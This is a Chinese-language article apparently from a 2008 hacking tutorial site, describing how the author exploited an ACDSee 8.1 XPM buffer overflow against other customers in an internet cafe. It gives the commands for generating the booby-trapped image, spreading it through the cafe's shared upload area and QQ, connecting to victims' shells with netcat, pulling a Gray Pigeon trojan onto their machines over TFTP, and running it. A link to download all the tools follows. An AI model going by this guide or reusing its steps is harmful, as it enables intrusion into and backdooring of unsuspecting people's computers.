为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

巧用ACDSee致命漏洞

2008-3-11 22:38| 投稿: security

摘要:  特别申明:此文由《网友世界》杂志社特别提供,未经允许,任何媒体不得摘编、转载。 对于ACDSee这款大名鼎鼎的软件,想必大家都不陌生吧?有没有想过它会成为你的帮凶,助你轻松自由地穿梭于他人的电脑中呢...
 特别申明:此文由《网友世界》杂志社特别提供,未经允许,任何媒体不得摘编、转载。 对于ACDSee这款大名鼎鼎的软件,想必大家都不陌生吧?有没有想过它会成为你的帮凶,助你轻松自由地穿梭于他人的电脑中呢?呵呵,ACDSee所使用的ID_X.apl、IDE_ACDStd.apl、ID_PSP.ap和AM_LHA.apl插件在处理XBM/XPM/PSP/LHA文件时存在缓冲区溢出漏洞,如果用户受骗打开了带有超长字符串XBM/XPM/PSP/LHA文件的话,就可能触发这些溢出,导致执行任意指令。   ACDSee10以下的版本可都有个致命的漏洞噢,这次我就遇到了这种情况,这个危险的漏洞据官方报道,影响的软件是ACDSee Photo Manager 9.0和ACDSee Photo Manager 8.1。废话不多说了,看看笔者的经历吧。测试漏洞 那次我进了一个离家较远的网吧,比较新鲜,便在机子硬盘里乱翻,发现装的软件是相当齐全的,Microsoft Office、Photoshop、Dreamever都装了,然后我便发现了ACDSee 8.1的身影(如图1)。我心中一喜,这个漏洞可以派上用场了!毕竟对于这些大软件,一般用户是很少更新的,跟别提在装了还原卡的网吧里了。开始工作吧!   图1 ACDSee 8.1首先下载我们这次活动的主角:ACDSee XPM文件溢出利用工具,将其放到一个文件夹中,然后打开“记事本”程序,在其中输入如下的代码:acdsee.exe 1 test.xpm,然后保存为一个批处理文件1.bat(如图2),和利用工具acdsee.exe放到一个文件夹中。   图2输入代码acdsee.exe 1 test.xpm   现在双击运行1.bat,就会在这个目录下面生成一个名字为test.xpm的文件了,这个XPM文件是默认被ACDSee程序关联打开的(如图3)。   图3生成的1.bat文件小提示:   使用这个bat文件是为了执行命令的方便,你也可以在cmd中进入到这个目录中,然后执行“acdsee.exe 1 test.xpm”,效果是一样的。 [#page_先在本机测试看看效果#0#0#0#0#]   先在本机上测试一下吧,双击这个XPM文件,打开了可爱的ACDSee窗口。呀,ACDSee死住了!这就是溢出的结果了,说明我们成功了,下面只有在“任务管理器”里把ACDSee终结了。   下面点击“开始”→“运行”,输入“cmd”后回车,打开“命令提示符”窗口,在其中输入“netstat -an”命令来查看本机的端口开放情况,看见了吗?4444端口打开了,并且处于监听状态(如图4)。快把这个文件发到我们网吧的公共上传区里,让别人来下载吧,那我们可就摇身一变“养鸡专业户”了。   图4系统已经处在监听状态了 小提示:   这个XPM文件的传播可以依赖网吧的公共上传区,也可以用QQ的同吧功能哦!点击QQ面板左边的“同吧”按钮,就可以看到你所在的这个网吧里所有的QQ用户了(如图5),传给他们吧。   图5发给QQ好友 [#page_抓一只“肉鸡”#0#0#0#0#] 等“鸡”上钩   玩了一会儿游戏,该有人打开了吧?试试吧。我选中一个发过去的目标,用“傻瓜化端口扫描器”小扫一下,果然4444打开着啊(如图6),嘻嘻。然后该祭出黑客必备利器——瑞士军刀NC来连接肉鸡以实现我们的计划了。   图6打开对方端口   下载NC,将其放在一个文件夹下,如上面说的,打开“记事本”程序,在其中输入如下的代码:nc 192.168.0.151 4444 (192.168.0.151是目标肉鸡的IP地址,4444就是它打开的待接端口喽),然后保存为一个批处理文件2.bat,和nc.exe放在同一个目录里。   双击运行2.bat这个文件,看见了?我们的NC顺利的连接上了肉鸡(如图7),并且返回了一个CMDShell,现在我们在这个窗口里的操作就等同于在肉鸡上执行命令了,嘻嘻。该是上传个木马的时候了,总不能什么都在这个命令提示符里操作吧,多不方便啊。说到上传木马,黑客最常用的就是tftp上传了,但是小菜们可能还不太熟悉tftp的使用,下面我来详细操作一下。   图7顺利地抓到一只“肉鸡” [#page_将木马安装到对方系统中#0#0#0#0#] 上传木马   首先,制作一个木马客户端,比如用灰鸽子,生成后把文件名改为muma.exe,留着备用,具体的制作过程我就不多说了,小CASE嘛!   然后,下载“TFTPD32”这款软件(如图8)。   图8 TFTPD32软件界面   把它和我们要上传的木马muma.exe放到同一个一个目录下(如图9),运行它之后就会自动在本机搭建一个TFTP服务器了。   图9将木马muma.exe放入同一个目录下   最后,将TFTPD32最小化,在刚刚得到的CMDShell里输入如下命令并回车确定: tftp -i 192.168.0.149 get muma.exe D:\muma.exe,就可以看到上传成功的显示了(如图10)。   图10显示上传成功   192.168.0.149是我这台电脑的IP地址,这条命令作用是把本机上的和TFTPD32在同一目录下的muma.exe上传到192.168.0.151上,并且放置到D:\下。小提示:   如果muma.exe不是和TFTPD32.exe放在同一目录下的话,也可以把上句中的muma.exe换成绝对路径,比如C:\windows\muma.exe,一样可以成功上传。   该在他的机上运行木马了,输入命令muma.exe即可,呵呵,喝杯饮料安心地等着马儿上线吧。过了一会儿,果然不出所料啊。   至此,一次完整的漏洞利用及入侵过程就结束了,ACDSee也可以帮助我们成为“养鸡专业户”噢!大家请到http://hi.baidu.com/biweilun/blog/item/a35993ca804f4185c91768b5.html下载所有工具。

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部